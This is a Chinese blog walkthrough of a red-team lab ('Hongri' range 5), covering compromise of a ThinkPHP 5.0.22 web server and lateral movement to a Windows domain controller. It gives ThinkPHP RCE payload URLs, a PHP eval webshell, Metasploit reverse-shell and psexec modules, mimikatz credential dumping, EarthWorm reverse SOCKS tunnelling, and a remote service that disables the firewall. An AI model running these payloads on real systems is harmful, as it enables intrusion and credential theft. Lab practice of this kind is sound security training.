红日内网渗透靶场5(ATK&CK红队评估实战靶场五)

环境搭建:

第一次登录会提示需要更改账号密码。

win7账号密码:

sun\heart 123.com

sun\Administrator dc123.com
—————————————————————————————————————————————————————————————
2008账号密码

sun\admin 2020.com


外网采用NAT模式,内网采用仅主机模式。

添加一个主机模式用于内网,设置网段为192.168.138.0.
NAT用于外网,设置网段为192.168.235.0
在这里插入图片描述
在这里插入图片描述

windows7需要配置双网卡
Web服务器(使用的是PHPStudy,记得自己手动开一下)
外网:192.168.235.101
内网:192.168.138.136

Windows Server 2008:
内网:192.168.138.138

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
注意windows7两个网卡的顺序



外网渗透:

外网渗透:
1、使用nmap进行扫描:

192.168.135.101为目标地址:主要开着80和3306端口
在这里插入图片描述

访问80端口发现是个thinkphp:
在这里插入图片描述

版本是ThinkPHP V5.0,既然是V5.0,那么我们就可以尝试一下Thinkphp远程命令执行漏洞。

漏洞描述:由于thinkphp对框架中的核心Requests类的method方法提供了表单请求伪造,该功能利用 P O S T [ m ′ e t h o d ′ ] 来 传 递 真 实 的 请 求 方 法 。 但 由 于 框 架 没 有 对 参 数 进 行 验 证 , 导 致 攻 击 者 可 以 设 置 _POST['_method']来传递真实的请求方法。但由于框架没有对参数进行验证,导致攻击者可以设置 POST[method]_POST[‘_method’]='__construct’而让该类的变量被覆盖。攻击者利用该方式将filter变量覆盖为system等函数名,当内部进行参数过滤时便会进行执行任意命令。

通过报错查看详细版本。可以看到这里版本是5.0.22
在这里插入图片描述

方法一:使用ThinkPHP一键检测工具进行漏洞检测

在这里插入图片描述

成功检测出漏洞后,利用漏洞上传木马文件。

<?php 
phpinfo();
@eval($_POST['shell']);
?>

在这里插入图片描述

查看URL可以看到,我们的一句话木马上传成功

在这里插入图片描述

接下来就是使用蚁剑进行连接
在这里插入图片描述

方法二,得到具体版本信息后
使用kali的searchsploit查找一下漏洞利用POC:

searchsploit thinkphp
在这里插入图片描述

最后一个是thinkphp5.X版本的RCE,我们进入该漏洞的文件46150.txt:
cd /usr/share/exploitdb/exploits/php/webapps

cat 46150.txt
在这里插入图片描述

使用payload进行验证:
查询账号
http://192.168.235.101/thinkphp/public/?s=.|think\config/get&name=database.username

http://192.168.235.101/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
命令执行成功:
在这里插入图片描述

可以利用payload写入Webshell:
http://192.168.235.101/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo “<?php phpinfo();@eval($_POST['shell']);?>” > shell2.php
在这里插入图片描述



内网信息收集:

使用 cobalt strike 进行渗透,要让我们 win7 上线,首先搭建 cs 环境,使用 kali 作为服务端,本机作为客户端
(前提:需要通过蚁剑将win7中的杀毒软件等防火墙进行关闭)
进入 cs 文件下使用 root 权限
1.启动服务端
在这里插入图片描述

本机打开客户端
在这里插入图片描述

创建监听器
在这里插入图片描述

生成 shell exe 木马利用蚁剑将木马程序上传到 win7 靶机

在这里插入图片描述
在这里插入图片描述

上传后使用蚁剑中的终端执行exe命令
start shell.exe

在这里插入图片描述

cs 中看到管理员已经上线
在这里插入图片描述
运行 mimikatz 读到了域管理员的密码

在这里插入图片描述
在这里插入图片描述

将权限提权到system

在这里插入图片描述

接着进行信息收集

查看本机ip,所在域:shell ipconfig /all
在这里插入图片描述

查看其他域内主机信息:shell net view

在这里插入图片描述

判断是否存在多个域:shell net view /domain
在这里插入图片描述

这里只存在一个sum域

在这里插入图片描述

查看域内用户:shell net user /domain

在这里插入图片描述

查看域控制器:net group “domain controllers” /domain

在这里插入图片描述

查看域管理员的名字:net group “domain admins” /domain

在这里插入图片描述

通过信息收集,目标主机所在的域环境,域名为sun.com,存在两台域主机DC和win7.DC的ip为:192.168.138.138,win7双网卡:192.168.235.101、192.168.138.136。
其中域控制器DC.sun.com,域管理员为Administrator。



横向移动:

方法一:
内网主机探活和端口扫描,这里我选择上传一个Ladon.exe进行扫描
探测内网主机存活情况:shell Ladon 192.168.138.0/24 ONlineIP

在这里插入图片描述

对其目标主机网段进行禁ping端口开放扫描:shell Ladon noping 192.168.138.136 PortScan
在这里插入图片描述
发现我们的域控主机开放了445端口,可以尝试psexec横向移动
在这里插入图片描述

在这里插入图片描述
DC成功上线
在这里插入图片描述
在这里插入图片描述
方法二:MSF

生成木马

use exploit/multi/script/web_delivery
show targets
set target 2 # 选择使用powershell类型的payload
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.235.146
Exploit

生成了一段powershell代码,使用蚁剑进行执行

在这里插入图片描述

利用蚁剑执行后,拿到system
在这里插入图片描述
在这里插入图片描述
接下来就是信息收集了,但是上面我们已经进行了信息收集,这里就直接跳过信息收集

msf路由转发
run autoroute -s 192.168.138.0/24
run autoroute -p
在这里插入图片描述
建立隧道
kali开启代理
vim /etc/proxychains4.conf
在这里插入图片描述
在最好将socks4进行注释,新增sock5 127.0.0.1 8888

kali启动

反弹方式创建 socks 代理
nohup ./ew_for_linux64 -s rcsocks -l 8888 -e 6666
#侦听1080端口,提供socks代理 并且将1080的代理发送到8888端口,此时也侦听8888端口,等待反弹连接
在这里插入图片描述
通过蚁剑把ew上传到win7上,win7连接kali
ew_for_Win.exe -s rssocks -d 192.168.235.146 -e 6666

在这里插入图片描述
隧道构建成功

wiki模块抓取密码

load kiwi
kiwi_cmd privilege::debug
kiwi_cmd sekurlsa::logonPasswords

在这里插入图片描述
报错了,这一看就是位数不对,mimikatz是32位,不能访问64位的,那就给迁移到64位

ps
migrate 348
在这里插入图片描述
在这里插入图片描述

再次执行
kiwi_cmd sekurlsa::logonPasswords

拿到域管理员的用户名和密码
在这里插入图片描述

利用Psexec登录域控
use exploit/windows/smb/psexec
set rhosts 192.168.138.138
set SMBDomain SUN
set SMBUser administrator
set SMBPass Lwj.123456 #密码
set payload windows/meterpreter/bind_tcp
set rhost 192.168.138.138
set lport 6666
Run

在这里插入图片描述
尝试防火墙,利用shell建立连接,关闭防火墙

net use \192.168.138.138\ipc$ “Lwj.123456” /user:“administrator”
sc \192.168.138.138 create unablefirewall binpath= “netsh advfirewall set allprofiles state off”
sc \192.168.138.138 start unablefirewall

在这里插入图片描述

再次连接

————————后面有时间再更新吧


  • 2
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值